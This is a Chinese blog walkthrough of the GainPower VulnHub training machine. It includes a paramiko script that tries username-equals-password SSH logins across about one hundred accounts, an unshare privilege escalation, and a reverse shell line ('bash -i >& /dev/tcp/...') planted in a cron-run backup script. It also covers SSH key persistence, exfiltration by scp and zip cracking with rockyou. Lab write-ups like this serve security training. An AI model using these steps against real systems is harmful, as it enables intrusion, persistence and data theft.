GainPower-vulnhub渗透测试

前言

GainPower-靶机渗透

靶机IP:192.168.1.158

KaLiIP:192.168.1.76

考点:

ssh脚本自动化登陆

unshare命令理解,pspy64使用,定时脚本反弹shell

生成ssh密钥对,密钥登陆ssh,scp使用

爆破zip密码

渗透过程

nmap扫描

image-20200705232953859

这里扫描出一个ssh服务,还有一个80端口和8000端口开放

访问80端口,没有找到可用信息,因为这里的页面都是静态页面

image-20200712175042221

然后访问8000端口

image-20200712175211460

这里是个控制台,但是我们不晓得账号和密码,暂时先放着…..

看到ssh服务,尝试登陆

image-20200712175318165

提示,有employee1,employee2等用户,尝试登陆

image-20200712175654102

然后登陆employee1:employee1,发现这里有超级多的账户

image-20200712185553669

一个个试过去,发现employee64有搞头,后来看了别人的思路,这里可以通过写脚本,来自动化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#! /usr/bin/env python
import paramiko
def fuckme(seraeste):
print seraeste
l_user=seraeste
l_password=seraeste
l_host="192.168.1.158"
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(l_host,username=l_user,password=l_password)
transport = ssh.get_transport()
session = transport.open_session()
session.set_combine_stderr(True)
session.get_pty()

session.exec_command("sudo -l")
stdin = session.makefile('wb',-1)
stdout=session.makefile('rb',-1)
stdin.write(l_password+'\n')
stdin.flush()
for line in stdout.read().splitlines():
print 'host: %s: %s:'%(l_host, line)

for x in range(1,101):
employ = 'employee'+str(x)
fuckme(employ)

image-20200712185933569

关于unshare

image-20200712190853926

employee64可以在programmer用户下免密使用unshare

这里使用unshare启动一个新的进程

1
sudo -u programmer /usr/bin/unshare /bin/bash

image-20200712191741609

然后查看id,可以看到programmerprome组下

查看该工作组拥有的功能权限

1
find / -group prome 2>/dev/null

image-20200712191920075

使用wget向靶机上传pspy64,使用pspy64查看进程运行情况

1
2
wget http://192.168.1.76/pspy64
./pspy64

看到这里会定时执行backup.sh

image-20200712192357306

所以我们可以修改backup.sh

1
2
vi /bin/bash /media/programmer/scripts/backup.sh 
bash -i >& /dev/tcp/192.168.1.76/7777 0>&1

image-20200712192727081

kali监听端口

image-20200712193037989

在目录里有一个secret.zip,想要把这个文件发送到kali上

image-20200712193222615

师傅教我用ssh登陆该用户,利用scp将其发送出来

因为发现这里有.ssh文件,并且这里的ssh服务是允许远程登录的,虽然我们不知道ssh登陆的密码,但是我们可以生成密钥对,使用密钥登陆,生成用户c0okb:cookie123

生成密钥对参考:https://www.runoob.com/w3cnote/set-ssh-login-key.html

image-20200712194340553

然后我们在Kali中使用密钥登陆,参考:CengBox2-vulnhub渗透测试

image-20200712194656148

使用scp传送

image-20200712195124507

image-20200712195158612

解密secret.zip

1
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt secret.zip

image-20200712195257256

image-20200712195529485

然后访问到8000端口

1
2
username:root
password:aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB

image-20200712195807236

Author: 我是小吴啦
Link: http://yoursite.com/2020/07/12/GainPower-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.